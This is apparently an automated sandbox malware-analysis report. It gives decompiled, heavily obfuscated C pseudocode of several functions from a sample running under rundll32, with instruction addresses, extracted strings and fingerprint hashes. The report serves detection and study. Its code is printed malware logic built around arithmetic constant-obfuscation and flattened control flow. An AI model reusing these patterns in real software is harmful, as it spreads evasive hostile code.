				_v1076 = _v1076 * 0x2c;
				_v1076 = _v1076 ^ 0x000d0b59;
				_v1068 = 0x8d71;
				_v1068 = _v1068 / _t299;
				_v1068 = _v1068 ^ 0x0000326e;
				_v1064 = 0xd7a3;
				_v1064 = _v1064 >> 0xd;
				_v1064 = _v1064 ^ 0x00005df9;
				_v1060 = 0xed2b;
				_v1060 = _v1060 ^ 0x64d9e662;
				_v1060 = _v1060 ^ 0x64d941f5;
				_v1148 = 0x8835;
				_v1148 = _v1148 + 0xffffd4eb;
				_t300 = 0x61;
				_v1148 = _v1148 * 0x34;
				_v1148 = _v1148 + 0x9f16;
				_v1148 = _v1148 ^ 0x0013bc95;
				_v1140 = 0x3032;
				_v1140 = _v1140 / _t300;
				_v1140 = _v1140 | 0x38ef646c;
				_t125 =  &_v1140; // 0x38ef646c
				_t301 = 0x36;
				_v1140 =  *_t125 / _t301;
				_v1140 = _v1140 ^ 0x010de54d;
				_v1124 = 0xc110;
				_v1124 = _v1124 << 7;
				_t302 = 0x3f;
				_v1124 = _v1124 / _t302;
				_v1124 = _v1124 ^ 0x00019318;
				_v1136 = 0x6a8;
				_v1136 = _v1136 ^ 0x800f5fd5;
				_v1136 = _v1136 ^ 0x17dc092f;
				_t303 = 0x37;
				_v1136 = _v1136 * 0x45;
				_v1136 = _v1136 ^ 0xebf4d978;
				_v1144 = 0x9345;
				_v1144 = _v1144 | 0xef963ffb;
				_v1144 = _v1144 / _t303;
				_v1144 = _v1144 ^ 0x045b7df9;
				_v1128 = 0xf550;
				_v1128 = _v1128 + 0xffff8b4b;
				_v1128 = _v1128 >> 1;
				_v1128 = _v1128 >> 8;
				_v1128 = _v1128 ^ 0x00000cb5;
				_v1072 = 0xd52f;
				_v1072 = _v1072 ^ 0xc146d284;
				_v1072 = _v1072 ^ 0xc146011a;
				_v1088 = 0xae87;
				_v1088 = _v1088 | 0xff36597f;
				_v1088 = _v1088 ^ 0xff36d7e8;
				_v1096 = 0xe081;
				_v1096 = _v1096 ^ 0xf8f61e03;
				_v1096 = _v1096 + 0xffff4bc3;
				_v1096 = _v1096 ^ 0xf8f624ac;
				do {
					while(_t261 != 0xe2b4321) {
						if(_t261 == 0x123adc07) {
							E0024B75F();
							_t261 = 0x38f4cd20;
							continue;
						}
						if(_t261 == 0x15946a4d) {
							_t246 = E002428CE( &_v520, _v1128, _v1072);
							__eflags = 0;
							 *_t246 = 0;
							return E00245AEA(_v1088, _v1096,  &_v520);
						}
						if(_t261 == 0x1dde1df8) {
							_push(_t261);
							E0025A889(_v1068, _v1064,  &_v1040);
							E00242BDD(_v1068,  &_v1040, _v1060, _v1148,  &_v1040, _v1140, _v1124);
							_t212 =  &_v1136; // 0xd
							_push( &_v1040);
							_push( &_v520);
							E00247B63( *_t212, _v1144, __eflags);
							_t306 =  &(_t306[0xa]);
							_t261 = 0x15946a4d;
							continue;
						}
						if(_t261 == 0x1f2b77a6) {
							_t256 =  *0x25ca2c; // 0x2c8300
							__eflags =  *((intOrPtr*)(_t256 + 0x224));
							_t261 =  !=  ? 0xe2b4321 : 0x123adc07;
							continue;
						}
						_t313 = _t261 - 0x38f4cd20;
						if(_t261 != 0x38f4cd20) {
							goto L12;
						}
						_push(_v1132);
						_t257 = E0025889D(0x25c9b0, _v1112, _t313);
						_pop(_t271);
						_t193 =  &_v1116; // 0xd
						_t293 =  *0x25ca2c; // 0x2c8300
						_t197 = _t293 + 0x230; // 0x77004d
						E0024C680(_t197, _v1108, _v1100, _t271,  *_t193,  *0x25ca2c, _t257,  &_v520);
						_t256 = E00252025(_v1120, _t257, _v1092, _v1076);
						_t306 =  &(_t306[9]);
						_t261 = 0x1dde1df8;
					}
					E002563C1();
					_t261 = 0x38f4cd20;
					L12:
					__eflags = _t261 - 0x3a4044d2;
				} while (__eflags != 0);
				return _t256;
			}

0x002512e2
0x002512e8
0x002512ef
0x002512f4
0x002512f9
0x00251301
0x00251309
0x00251311
0x00251319
0x00251321
0x00251332
0x0025133c
0x00251341
0x00251347
0x0025134f
0x00251357
0x0025135f
0x00251367
0x0025136f
0x00251377
0x0025137f
0x0025138b
0x00251390
0x00251396
0x0025139e
0x002513a6
0x002513ab
0x002513b3
0x002513bb
0x002513c0
0x002513c5
0x002513c6
0x002513ca
0x002513d2
0x002513da
0x002513e2
0x002513e7
0x002513ef
0x002513fc
0x00251400
0x00251405
0x0025140d
0x00251415
0x0025141a
0x00251422
0x0025142a
0x00251432
0x0025143a
0x00251442
0x0025144a
0x00251457
0x0025145b
0x00251463
0x00251471
0x00251475
0x0025147d
0x00251485
0x0025148a
0x00251492
0x0025149a
0x002514a2
0x002514aa
0x002514b2
0x002514c3
0x002514d0
0x002514d9
0x002514e1
0x002514e9
0x002514f9
0x002514fd
0x00251505
0x00251509
0x0025150e
0x00251514
0x0025151c
0x00251524
0x0025152d
0x00251532
0x00251538
0x00251540
0x00251548
0x00251550
0x0025155d
0x0025155e
0x00251562
0x0025156a
0x00251572
0x00251580
0x00251584
0x0025158c
0x00251594
0x0025159c
0x002515a0
0x002515a5
0x002515ad
0x002515b5
0x002515bd
0x002515c5
0x002515cd
0x002515d5
0x002515dd
0x002515e5
0x002515ed
0x002515f5
0x002515fd
0x002515fd
0x00251607
0x00251713
0x00251718
0x00000000
0x00251718
0x00251613
0x00251747
0x00251750
0x00251752
0x00000000
0x00251767
0x0025161f
0x002516b9
0x002516bf
0x002516e0
0x002516f0
0x002516f4
0x002516fc
0x002516fd
0x00251702
0x00251705
0x00000000
0x00251705
0x0025162b
0x0025169b
0x002516a2
0x002516a9
0x00000000
0x002516a9
0x0025162d
0x0025162f
0x00000000
0x00000000
0x00251635
0x00251642
0x00251647
0x00251659
0x00251666
0x00251670
0x00251676
0x00251689
0x0025168e
0x00251691
0x00251691
0x00251723
0x00251728
0x0025172a
0x0025172a
0x0025172a
0x00000000

Strings

+, xrefs: 00251492
B, xrefs: 00251405
n2, xrefs: 00251475
IP, xrefs: 002513CA
k, xrefs: 00251309
j_, xrefs: 0025139E
m , xrefs: 002513C0, 0025170F, 002516F0, 00251659
ld8, xrefs: 00251505

Memory Dump Source

Source File: 00000007.00000002.2104303323.0000000000241000.00000020.00000001.sdmp, Offset: 00240000, based on PE: true

Associated: 00000007.00000002.2104292967.0000000000240000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.2104345430.000000000025C000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_240000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: m $+$IP$j_$k$ld8$n2$B
API String ID: 0-4100556268
Opcode ID: ddfe2bab3256add382b1f7896d7714a78edcb8e279b63326a2b911e7c986abca
Instruction ID: b030d1ab2872ea3dc24a7d800b0310c15c636de5f383f18846a79820163b688e
Opcode Fuzzy Hash: ddfe2bab3256add382b1f7896d7714a78edcb8e279b63326a2b911e7c986abca
Instruction Fuzzy Hash: 15B150710183819FD358CF25C589A1BBBE1BBC4758F508A1EF596862A0C7B4CA19CF47

Uniqueness

Uniqueness Score: -1.00%

Function 0024B75F, Relevance: 10.2, Strings: 8, Instructions: 223
COMMONCrypto

Download Yara Rule

C-Code - Quality: 98%

			E0024B75F() {
				signed int _v4;
				char _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				void* _t216;
				intOrPtr* _t217;
				void* _t218;
				intOrPtr _t226;
				intOrPtr* _t227;
				signed int _t228;
				signed int _t229;
				signed int _t230;
				signed int _t231;
				signed int _t232;
				signed int _t233;
				signed int _t234;
				signed int _t235;
				void* _t236;
				void* _t241;
				void* _t265;
				signed int* _t269;

				_t269 =  &_v88;
				_v64 = 0xcca9;
				_v64 = _v64 | 0x3d0c477d;
				_v64 = _v64 + 0x3ec7;
				_v64 = _v64 ^ 0xbd0d0ec5;
				_v60 = 0x38c3;
				_v60 = _v60 << 4;
				_v60 = _v60 >> 6;
				_v60 = _v60 ^ 0x00000e32;
				_v88 = 0xa439;
				_v88 = _v88 + 0x34d8;
				_v88 = _v88 << 0xe;
				_v4 = 0;
				_v88 = _v88 * 0x46;
				_t265 = 0x32863a22;
				_v88 = _v88 ^ 0xd6a9fef0;
				_v32 = 0x5041;
				_v32 = _v32 ^ 0x94936571;
				_v32 = _v32 ^ 0x94934631;
				_v52 = 0x47aa;
				_t228 = 0x6b;
				_v52 = _v52 * 0x59;
				_v52 = _v52 / _t228;
				_v52 = _v52 ^ 0x00001934;
				_v76 = 0x9d13;
				_v76 = _v76 | 0xffbf7fdf;
				_t229 = 0x4b;
				_v76 = _v76 * 0x38;
				_v76 = _v76 ^ 0xf1ffac33;
				_v56 = 0x2528;
				_v56 = _v56 ^ 0xff11bbbe;
				_v56 = _v56 / _t229;
				_v56 = _v56 ^ 0x0366a499;
				_v80 = 0x942e;
				_t230 = 0x65;
				_v80 = _v80 / _t230;
				_v80 = _v80 << 0x10;
				_v80 = _v80 ^ 0x4cc19e00;
				_v80 = _v80 ^ 0x4db6b316;
				_v28 = 0xb3;
				_t231 = 0x4f;
				_v28 = _v28 / _t231;
				_v28 = _v28 ^ 0x00007dc1;
				_v84 = 0xb6fa;
				_t232 = 0x7e;
				_v84 = _v84 * 0x7b;
				_v84 = _v84 + 0x74c4;
				_v84 = _v84 + 0xffff1df9;
				_v84 = _v84 ^ 0x005758b1;
				_v48 = 0xb943;
				_v48 = _v48 / _t232;
				_v48 = _v48 << 0xe;
				_v48 = _v48 ^ 0x005e2ced;
				_v24 = 0x593;
				_t233 = 0x59;
				_t225 = _v4;
				_v24 = _v24 * 0x2c;
				_v24 = _v24 ^ 0x0000804c;
				_v72 = 0xf7ad;
				_v72 = _v72 / _t233;
				_v72 = _v72 << 8;
				_v72 = _v72 + 0xb94c;
				_v72 = _v72 ^ 0x0003edcb;
				_v20 = 0xede5;
				_t234 = 0x17;
				_v20 = _v20 / _t234;
				_v20 = _v20 ^ 0x00002281;
				_v40 = 0x2895;
				_v40 = _v40 << 7;
				_v40 = _v40 << 8;
				_v40 = _v40 ^ 0x144a8d7d;
				_v44 = 0x7178;
				_v44 = _v44 >> 0xa;
				_t235 = 0xf;
				_v44 = _v44 / _t235;
				_v44 = _v44 ^ 0x00005c52;
				_v68 = 0xc8ae;
				_v68 = _v68 | 0xfda66fe8;
				_v68 = _v68 << 0xa;
				_v68 = _v68 >> 5;
				_v68 = _v68 ^ 0x04dddb27;
				_v12 = 0xea07;
				_v12 = _v12 + 0xffffa6b0;
				_v12 = _v12 ^ 0x0000adca;
				_v16 = 0x7743;
				_v16 = _v16 | 0x2d86c018;
				_v16 = _v16 ^ 0x2d86a9dd;
				_v36 = 0x116e;
				_v36 = _v36 >> 0xc;
				_v36 = _v36 ^ 0x542dd378;
				_v36 = _v36 ^ 0x542dcb57;
				while(1) {
					L1:
					_t236 = 0x5c;
					_t216 = 0x1a27fc18;
					do {
						while(_t265 != 0x14fc2c0b) {
							if(_t265 == _t216) {
								_t217 = E0024E22B(_v20, _v40, _v8, _t225, _v44);
								_t269 =  &(_t269[3]);
								__eflags = _t217;
								_t265 = 0x35b0a114;
								_v4 = 0 | __eflags == 0x00000000;
								goto L1;
							} else {
								if(_t265 == 0x2364314f) {
									_push(_v32);
									_t218 = E0025889D(0x25c9d0, _v88, __eflags);
									_pop(_t241);
									__eflags = E00253EB3(_v52, _t241, _t218, _v76, _v56, 0x25c9d0, _v80, _v28, 0x25c9d0, _v84, 0x25c9d0, _v60, _v64,  &_v8);
									_t265 =  ==  ? 0x1a27fc18 : 0x34b93fb8;
									E00252025(_v48, _t218, _v24, _v72);
									_t269 =  &(_t269[0xf]);
									_t236 = 0x5c;
									L16:
									_t216 = 0x1a27fc18;
									goto L17;
								} else {
									if(_t265 == 0x32863a22) {
										_t265 = 0x14fc2c0b;
										continue;
									} else {
										if(_t265 != 0x35b0a114) {
											goto L17;
										} else {
											E002465A2(_v8, _v68, _v12, _v16, _v36);
										}
									}
								}
							}
							L8:
							return _v4;
						}
						_t226 =  *0x25ca2c; // 0x2c8300
						_t227 = _t226 + 0x230;
						while(1) {
							__eflags =  *_t227 - _t236;
							if( *_t227 == _t236) {
								break;
							}
							_t227 = _t227 + 2;
							__eflags = _t227;
						}
						_t225 = _t227 + 2;
						__eflags = _t227 + 2;
						_t265 = 0x2364314f;
						goto L16;
						L17:
						__eflags = _t265 - 0x34b93fb8;
					} while (__eflags != 0);
					goto L8;
				}
			}

0x0024b75f
0x0024b762
0x0024b76c
0x0024b776
0x0024b77e
0x0024b786
0x0024b78e
0x0024b793
0x0024b798
0x0024b7a0
0x0024b7a7
0x0024b7ae
0x0024b7b2
0x0024b7be
0x0024b7c2
0x0024b7c7
0x0024b7cf
0x0024b7d7
0x0024b7df
0x0024b7e7
0x0024b7f6
0x0024b7f9
0x0024b805
0x0024b809
0x0024b811
0x0024b819
0x0024b826
0x0024b829
0x0024b82d
0x0024b835
0x0024b83d
0x0024b84d
0x0024b851
0x0024b859
0x0024b865
0x0024b86a
0x0024b870
0x0024b875
0x0024b87d
0x0024b885
0x0024b891
0x0024b896
0x0024b89c
0x0024b8a4
0x0024b8b1
0x0024b8b2
0x0024b8b6
0x0024b8be
0x0024b8c6
0x0024b8ce
0x0024b8dc
0x0024b8e0
0x0024b8e5
0x0024b8ed
0x0024b903
0x0024b906
0x0024b90a
0x0024b90e
0x0024b916
0x0024b926
0x0024b92a
0x0024b92f
0x0024b937
0x0024b93f
0x0024b94b
0x0024b950
0x0024b956
0x0024b95e
0x0024b966
0x0024b96b
0x0024b970
0x0024b978
0x0024b980
0x0024b989
0x0024b98c
0x0024b990
0x0024b998
0x0024b9a0
0x0024b9a8
0x0024b9ad
0x0024b9b2
0x0024b9ba
0x0024b9c2
0x0024b9ca
0x0024b9d2
0x0024b9da
0x0024b9e2
0x0024b9ea
0x0024b9f2
0x0024b9f7
0x0024b9ff
0x0024ba07
0x0024ba07
0x0024ba09
0x0024ba0a
0x0024ba0f
0x0024ba0f
0x0024ba19
0x0024bae9
0x0024baf0
0x0024baf3
0x0024baf5
0x0024bafd
0x00000000
0x0024ba1f
0x0024ba25
0x0024ba67
0x0024ba74
0x0024ba79
0x0024baaf
0x0024bac8
0x0024bacb
0x0024bad0
0x0024bad5
0x0024bb24
0x0024bb24
0x00000000
0x0024ba27
0x0024ba2d
0x0024ba63
0x00000000
0x0024ba2f
0x0024ba35
0x00000000
0x0024ba3b
0x0024ba4f
0x0024ba54
0x0024ba35
0x0024ba2d
0x0024ba25
0x0024ba57
0x0024ba62
0x0024ba62
0x0024bb06
0x0024bb0c
0x0024bb17
0x0024bb17
0x0024bb1a
0x00000000
0x00000000
0x0024bb14
0x0024bb14
0x0024bb14
0x0024bb1c
0x0024bb1c
0x0024bb1f
0x00000000
0x0024bb29
0x0024bb29
0x0024bb29
0x00000000
0x0024bb35

Strings

O1d#, xrefs: 0024BB1F
(%, xrefs: 0024B835
xq, xrefs: 0024B978
,^, xrefs: 0024B8E5
AP, xrefs: 0024B7CF
Cw, xrefs: 0024B9D2
R\, xrefs: 0024B990
O1d#, xrefs: 0024BA1F

Memory Dump Source

Source File: 00000007.00000002.2104303323.0000000000241000.00000020.00000001.sdmp, Offset: 00240000, based on PE: true

Associated: 00000007.00000002.2104292967.0000000000240000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.2104345430.000000000025C000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_240000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: (%$AP$Cw$O1d#$O1d#$R\$xq$,^
API String ID: 0-1090126677
Opcode ID: fff54f95ff17237c27e415f4e2650cfbcdc8ca469cad32d301a6fe38600e5103
Instruction ID: 1436c3b288dcf4f097512e2638c29c2d6ad8dd5ca84ade175ba04626810cb90a
Opcode Fuzzy Hash: fff54f95ff17237c27e415f4e2650cfbcdc8ca469cad32d301a6fe38600e5103
Instruction Fuzzy Hash: 1AA142B16093409FE359CF64C98A81BBBE2FBC4B48F10491DF585862A0D7B9CA59CF43

Uniqueness

Uniqueness Score: -1.00%

Function 0024EA4C, Relevance: 10.2, Strings: 8, Instructions: 203
COMMONCrypto

Download Yara Rule

C-Code - Quality: 92%

			E0024EA4C(void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr* _a12, intOrPtr _a16) {
				signed int _v4;
				intOrPtr _v8;
				char _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				void* __ecx;
				void* _t188;
				void* _t219;
				intOrPtr* _t220;
				void* _t222;
				void* _t241;
				void* _t242;
				signed int _t243;
				signed int _t244;
				signed int _t245;
				signed int _t246;
				signed int _t247;
				signed int _t248;
				signed int _t249;
				signed int* _t252;

				_t220 = _a12;
				_push(_a16);
				_t241 = __edx;
				_push(_t220);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				E0024602B(_t188);
				_v8 = 0x50f8de;
				_t242 = 0;
				_v4 = _v4 & 0;
				_t252 =  &(( &_v80)[6]);
				_v76 = 0x4711;
				_v76 = _v76 + 0x6e0d;
				_t222 = 0x302d2de5;
				_v76 = _v76 << 0x10;
				_v76 = _v76 | 0x353296c6;
				_v76 = _v76 ^ 0xb53e96c7;
				_v52 = 0x1390;
				_v52 = _v52 << 4;
				_v52 = _v52 | 0x6ec3950a;
				_t243 = 0x1f;
				_v52 = _v52 * 0x25;
				_v52 = _v52 ^ 0x024a5273;
				_v64 = 0xc0d5;
				_v64 = _v64 >> 3;
				_v64 = _v64 ^ 0x4ce1daf8;
				_v64 = _v64 + 0xffff0c87;
				_v64 = _v64 ^ 0x4ce0d906;
				_v24 = 0xb115;
				_v24 = _v24 / _t243;
				_v24 = _v24 ^ 0x000025ae;
				_v68 = 0xbf02;
				_v68 = _v68 >> 1;
				_v68 = _v68 >> 7;
				_v68 = _v68 | 0xaaaffe07;
				_v68 = _v68 ^ 0xaaaf82c8;
				_v72 = 0x967c;
				_v72 = _v72 ^ 0xbb45b93e;
				_t244 = 0x5e;
				_v72 = _v72 * 0x31;
				_v72 = _v72 | 0x543854ee;
				_v72 = _v72 ^ 0xdc3e0629;
				_v28 = 0xb197;
				_v28 = _v28 / _t244;
				_v28 = _v28 ^ 0x00005929;
				_v80 = 0xf6df;
				_v80 = _v80 * 0x2c;
				_v80 = _v80 + 0xffff5b03;
				_v80 = _v80 ^ 0xcc4f4477;
				_v80 = _v80 ^ 0xcc66b212;
				_v60 = 0x7f94;
				_v60 = _v60 * 0x70;
				_v60 = _v60 + 0xffff5d6f;
				_v60 = _v60 + 0xffffe912;
				_v60 = _v60 ^ 0x0037713c;
				_v40 = 0x7639;
				_v40 = _v40 ^ 0xf24db204;
				_v40 = _v40 * 0xf;
				_v40 = _v40 ^ 0x328e289a;
				_v20 = 0xd74f;
				_v20 = _v20 | 0xd22ad029;
				_v20 = _v20 ^ 0xd22a9d24;
				_v16 = 0xecd5;
				_v16 = _v16 << 7;
				_v16 = _v16 ^ 0x0076152b;
				_v44 = 0x5bc3;
				_v44 = _v44 + 0x5ef7;
				_v44 = _v44 | 0x81401b0a;
				_v44 = _v44 >> 0xf;
				_v44 = _v44 ^ 0x00015921;
				_v32 = 0x3f29;
				_t245 = 0x22;
				_v32 = _v32 / _t245;
				_v32 = _v32 >> 0xd;
				_v32 = _v32 ^ 0x00005264;
				_v48 = 0x731;
				_v48 = _v48 | 0x306aed8f;
				_v48 = _v48 + 0xffff48d8;
				_t246 = 0x76;
				_v48 = _v48 / _t246;
				_v48 = _v48 ^ 0x0069195c;
				_v36 = 0x33bb;
				_t247 = 0x45;
				_v36 = _v36 / _t247;
				_v36 = _v36 + 0xffffe7cb;
				_v36 = _v36 ^ 0xfffff379;
				_v56 = 0xdfcb;
				_t248 = 0x48;
				_v56 = _v56 / _t248;
				_t249 = 0x3a;
				_v56 = _v56 / _t249;
				_v56 = _v56 * 0x52;
				_v56 = _v56 ^ 0x00005386;
				do {
					while(_t222 != 0x246653ae) {
						if(_t222 == 0x260f4fd2) {
							_push(_t222);
							_push(_t222);
							_t242 = E00248736(_v12);
							if(_t242 != 0) {
								_t222 = 0x246653ae;
								continue;
							}
						} else {
							if(_t222 == 0x2ff0f75c) {
								_t219 = E002559A5(_v64, 0, _t241,  &_v12, _v24, _v68, _v72, _v28, _t222, _v76, _v80);
								_t252 =  &(_t252[0xb]);
								if(_t219 != 0) {
									_t222 = 0x260f4fd2;
									continue;
								}
							} else {
								if(_t222 != 0x302d2de5) {
									goto L11;
								} else {
									_t222 = 0x2ff0f75c;
									continue;
								}
							}
						}
						goto L12;
					}
					E002559A5(_v16, _t242, _t241,  &_v12, _v44, _v32, _v48, _v36, _t222, _v52, _v56);
					_t252 =  &(_t252[0xb]);
					 *_t220 = _v12;
					_t222 = 0x6a13bb9;
					L11:
				} while (_t222 != 0x6a13bb9);
				L12:
				return _t242;
			}

0x0024ea50
0x0024ea57
0x0024ea5b
0x0024ea5d
0x0024ea5e
0x0024ea62
0x0024ea66
0x0024ea68
0x0024ea6d
0x0024ea75
0x0024ea77
0x0024ea7b
0x0024ea7e
0x0024ea88
0x0024ea90
0x0024ea95
0x0024ea9a
0x0024eaa2
0x0024eaaa
0x0024eab2
0x0024eab7
0x0024eac6
0x0024eac9
0x0024eacd
0x0024ead5
0x0024eadd
0x0024eae2
0x0024eaea
0x0024eaf2
0x0024eafa
0x0024eb0a
0x0024eb0e
0x0024eb16
0x0024eb1e
0x0024eb22
0x0024eb27
0x0024eb2f
0x0024eb37
0x0024eb3f
0x0024eb4c
0x0024eb4d
0x0024eb51
0x0024eb59
0x0024eb61
0x0024eb6f
0x0024eb73
0x0024eb7b
0x0024eb88
0x0024eb8c
0x0024eb94
0x0024eb9c
0x0024eba4
0x0024ebb1
0x0024ebb5
0x0024ebbd
0x0024ebc5
0x0024ebcd
0x0024ebd5
0x0024ebe2
0x0024ebe6
0x0024ebee
0x0024ebf6
0x0024ebfe
0x0024ec06
0x0024ec10
0x0024ec15
0x0024ec1d
0x0024ec25
0x0024ec2d
0x0024ec35
0x0024ec3a
0x0024ec42
0x0024ec50
0x0024ec55
0x0024ec5b
0x0024ec60
0x0024ec68
0x0024ec70
0x0024ec78
0x0024ec84
0x0024ec89
0x0024ec8f
0x0024ec97
0x0024eca3
0x0024eca8
0x0024ecae
0x0024ecb6
0x0024ecbe
0x0024ecca
0x0024eccf
0x0024ecd9
0x0024ece1
0x0024ecea
0x0024ecee
0x0024ecf6
0x0024ecf6
0x0024ed04
0x0024ed65
0x0024ed66
0x0024ed70
0x0024ed76
0x0024ed78
0x00000000
0x0024ed78
0x0024ed06
0x0024ed0c
0x0024ed46
0x0024ed4b
0x0024ed50
0x0024ed52
0x00000000
0x0024ed52
0x0024ed0e
0x0024ed14
0x00000000
0x0024ed1a
0x0024ed1a
0x00000000
0x0024ed1a
0x0024ed14
0x0024ed0c
0x00000000
0x0024ed04
0x0024eda3
0x0024edaf
0x0024edb2
0x0024edb4
0x0024edb9
0x0024edb9
0x0024edc6
0x0024edce

Strings

)?, xrefs: 0024EC42
--0, xrefs: 0024ED0E
dR, xrefs: 0024EC60
--0, xrefs: 0024EA90
9v, xrefs: 0024EBCD
<q7, xrefs: 0024EBC5
T8T, xrefs: 0024EB51
n, xrefs: 0024EA88

Memory Dump Source

Source File: 00000007.00000002.2104303323.0000000000241000.00000020.00000001.sdmp, Offset: 00240000, based on PE: true

Associated: 00000007.00000002.2104292967.0000000000240000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.2104345430.000000000025C000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_240000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: n$)?$9v$<q7$dR$--0$--0$T8T
API String ID: 0-1820671589
Opcode ID: be8d65528413908eb97d300261921cde85efd59b20c5887c49dbf67893863774
Instruction ID: fb51fc97df1bbc0cbbd79ed4235564eeb8eed67b28ab757a4d8e3eac5a1caf62
Opcode Fuzzy Hash: be8d65528413908eb97d300261921cde85efd59b20c5887c49dbf67893863774
Instruction Fuzzy Hash: 019153714093419BD768CF61C98981FFBF1FBC9B58F404A1DF296862A0C3B68A158F47

Uniqueness

Uniqueness Score: -1.00%

Function 0025A0AF, Relevance: 9.0, Strings: 7, Instructions: 283
COMMONCrypto

Download Yara Rule

C-Code - Quality: 96%

			E0025A0AF(void* __ecx, void* __edx, intOrPtr _a4, signed int _a8) {
				intOrPtr _v4;
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				signed int _v108;
				void* _t237;
				void* _t251;
				void* _t256;
				short _t257;
				void* _t258;
				void* _t262;
				signed int _t268;
				signed int _t269;
				void* _t271;
				signed int _t309;
				signed int _t310;
				signed int _t311;
				signed int _t312;
				signed int _t313;
				signed int _t314;
				signed int _t315;
				signed int _t316;
				signed int _t317;
				intOrPtr _t319;
				signed int _t320;
				signed int _t323;
				signed int* _t325;
				void* _t327;

				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E0024602B(_t237);
				_v8 = _v8 & 0x00000000;
				_t325 =  &(( &_v108)[4]);
				_v36 = 0x3ea4;
				_v36 = _v36 >> 7;
				_t271 = 0x1d995f52;
				_v36 = _v36 ^ 0x0000fd94;
				_v100 = 0xb5d8;
				_t313 = 0x12;
				_v100 = _v100 / _t313;
				_v100 = _v100 + 0xffffd667;
				_v100 = _v100 << 9;
				_v100 = _v100 ^ 0xffc12715;
				_v44 = 0xa7b5;
				_v44 = _v44 + 0x5ef4;
				_v44 = _v44 ^ 0x00014b95;
				_v48 = 0x9389;
				_v48 = _v48 + 0xb0ba;
				_v48 = _v48 ^ 0x000118ce;
				_v88 = 0x5fea;
				_t314 = 0x1c;
				_v88 = _v88 * 0x7c;
				_v88 = _v88 ^ 0x636ec63e;
				_v88 = _v88 ^ 0x63409d32;
				_v16 = 0x76ea;
				_v16 = _v16 << 5;
				_v16 = _v16 ^ 0x000ec3ec;
				_v20 = 0x91aa;
				_v20 = _v20 | 0x0edf39e6;
				_v20 = _v20 ^ 0x0edfdf8b;
				_v52 = 0xaa70;
				_v52 = _v52 + 0x8ed4;
				_v52 = _v52 ^ 0x00017b8d;
				_v104 = 0xa114;
				_v104 = _v104 >> 5;
				_v104 = _v104 << 0xc;
				_v104 = _v104 / _t314;
				_v104 = _v104 ^ 0x0002b555;
				_v108 = 0xd093;
				_v108 = _v108 << 0xa;
				_t315 = 0x69;
				_v108 = _v108 * 0x4a;
				_v108 = _v108 / _t315;
				_v108 = _v108 ^ 0x024bf4a9;
				_v80 = 0x5298;
				_v80 = _v80 | 0xf2bddfef;
				_v80 = _v80 ^ 0xf2bdee35;
				_v84 = 0xad61;
				_v84 = _v84 << 6;
				_v84 = _v84 ^ 0x5376a172;
				_v84 = _v84 ^ 0x535d9bb3;
				_v96 = 0xfad4;
				_v96 = _v96 + 0xc0fb;
				_t316 = 0x75;
				_v96 = _v96 / _t316;
				_t317 = 0x41;
				_t323 = _a8;
				_v96 = _v96 / _t317;
				_v96 = _v96 ^ 0x00007e63;
				_v40 = 0x6cc;
				_v40 = _v40 + 0x5321;
				_v40 = _v40 ^ 0x00002fe7;
				_v76 = 0xe38c;
				_v76 = _v76 + 0x66b4;
				_v76 = _v76 >> 5;
				_v76 = _v76 ^ 0x00001a53;
				_v68 = 0xaffd;
				_v68 = _v68 + 0x9b0e;
				_v68 = _v68 ^ 0x74692a2f;
				_v68 = _v68 ^ 0x74685d67;
				_v92 = 0xd493;
				_v92 = _v92 >> 5;
				_v92 = _v92 + 0xffffb819;
				_v92 = _v92 << 3;
				_v92 = _v92 ^ 0xfffdea97;
				_v32 = 0x61b7;
				_v32 = _v32 >> 0xa;
				_v32 = _v32 ^ 0x00001b97;
				_v72 = 0x8555;
				_v72 = _v72 >> 6;
				_v72 = _v72 >> 7;
				_v72 = _v72 ^ 0x00005e98;
				_v64 = 0xfd5d;
				_v64 = _v64 ^ 0xfb760f92;
				_v64 = _v64 + 0xe44c;
				_v64 = _v64 ^ 0xfb77c0e2;
				_v24 = 0xfd78;
				_v24 = _v24 ^ 0x534e19f9;
				_v24 = _v24 ^ 0x534eb204;
				_v28 = 0xae38;
				_v28 = _v28 ^ 0x0fcca386;
				_v28 = _v28 ^ 0x0fcc33c1;
				_t268 = _a8;
				_v56 = 0x9a6f;
				_v56 = _v56 | 0xcfdc8d68;
				_v56 = _v56 ^ 0xf237fb5d;
				_v56 = _v56 ^ 0x3deb56e2;
				_v12 = 0xde50;
				_v12 = _v12 << 0xc;
				_v12 = _v12 ^ 0x0de56132;
				_v60 = 0x8399;
				_v60 = _v60 ^ 0x95508e48;
				_v60 = _v60 ^ 0xc724022f;
				_v60 = _v60 ^ 0x52742192;
				while(1) {
					L1:
					_t251 = 0x10ef006b;
					do {
						while(1) {
							L2:
							_t327 = _t271 - 0x1d995f52;
